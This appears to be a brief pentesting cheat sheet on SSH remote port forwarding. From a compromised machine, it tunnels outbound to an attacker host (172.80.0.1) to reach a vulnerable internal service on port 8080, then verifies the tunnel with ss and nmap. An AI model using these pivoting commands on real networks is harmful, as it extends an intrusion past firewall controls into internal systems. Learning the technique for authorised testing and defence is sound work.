Remote Port Forwarding

Remote Port Forwading

In case , we have shell to 172.65.0.5 but inbound ssh service is prohibited than we can tunnel by outbound ssh on attacker machine(172.80.0.1) to any vulnerable service on target like 192.162.1.2 on port 8080

• Enable ssh on attacker machine systemctl start ssh

• On compromised machine, here R is for remote ssh -R <attacker-local-port>:<target-ip>:<target-port> <user>@<attacker-ip> -fN ssh -R 8000:192.162.1.2:8080 user@172.80.0.1 -fN

• To check if tunnelling is successful. On attacker machine ss -antp | grep "8080” sudo nmap -sS -sV 127.0.0.1 -p 8080